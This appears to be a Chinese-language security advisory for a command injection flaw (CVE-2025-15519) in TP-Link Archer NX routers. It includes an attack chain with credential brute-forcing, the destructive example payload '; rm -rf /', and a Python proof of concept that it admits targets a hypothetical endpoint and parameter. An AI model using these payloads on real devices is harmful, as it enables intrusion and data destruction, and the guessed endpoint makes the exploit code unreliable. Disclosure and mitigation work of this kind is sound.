CVE-2025-15519 CVSS 7.2 高危

CVE-2025-15519 TP-Link Archer NX系列命令注入漏洞

披露日期: 2026-03-23

来源: f23511db-6c3e-4e32-a477-6aa17d310630

漏洞信息

漏洞编号

CVE-2025-15519

漏洞类型

操作系统命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

TP-Link Archer NX200, NX210, NX500, NX600

漏洞概述

TP-Link Archer NX200、NX210、NX500及NX600路由器的调制解调器管理CLI命令存在输入验证缺陷。经过身份验证的攻击者可利用该漏洞在操作系统层面执行任意命令，从而完全控制设备，影响其机密性、完整性和可用性。

技术细节

该漏洞源于受影响设备的调制解调器管理CLI命令对用户输入处理不当。攻击者需拥有管理员权限（PR:H），通过向该CLI接口发送特制的恶意输入，将攻击载荷拼接到系统执行命令中。由于缺乏有效的过滤机制，攻击者可注入分隔符（如分号或反引号）以执行额外的操作系统命令，导致远程代码执行（RCE）。

攻击链分析

STEP 1

信息收集

识别目标设备为TP-Link Archer NX系列路由器，并确认其开放管理接口。

STEP 2

获取权限

通过暴力破解、默认凭据或社会工程学手段获取路由器的管理员账号和密码。

STEP 3

漏洞利用

使用管理员权限登录管理后台，访问调制解调器管理CLI接口，发送包含恶意命令的注入载荷（例如 `; rm -rf /`）。

STEP 4

执行命令

设备后端将恶意输入作为操作系统命令执行，攻击者获得设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2025-15519
# Target: TP-Link Archer NX200, NX210, NX500, NX600
# Requires: Admin privileges

target_ip = "192.168.0.1"
username = "admin"
password = "admin"  # Replace with actual creds

login_url = f"http://{target_ip}/"
exploit_url = f"http://{target_ip}/admin/modem/manage" # Hypothetical vulnerable endpoint

session = requests.Session()

# 1. Authenticate
login_payload = {"username": username, "password": password}
session.post(login_url, data=login_payload)

# 2. Exploit Command Injection
# Payload: ; id (Execute 'id' command)
payload = "; id"

# Assuming the vulnerable parameter is 'cli_cmd'
exploit_payload = {"cli_cmd": payload}

response = session.post(exploit_url, data=exploit_payload)

if response.status_code == 200:
    print("Request sent. Check response for command output.")
else:
    print("Failed to send request.")

影响范围

TP-Link Archer NX200 (特定固件版本)

TP-Link Archer NX210 (特定固件版本)

TP-Link Archer NX500 (特定固件版本)

TP-Link Archer NX600 (特定固件版本)

防御指南

临时缓解措施

在未安装补丁前，建议关闭路由器的远程管理功能，并通过ACL限制内网对管理界面的访问，确保管理员账号使用强密码，防止攻击者获得必要权限进行利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表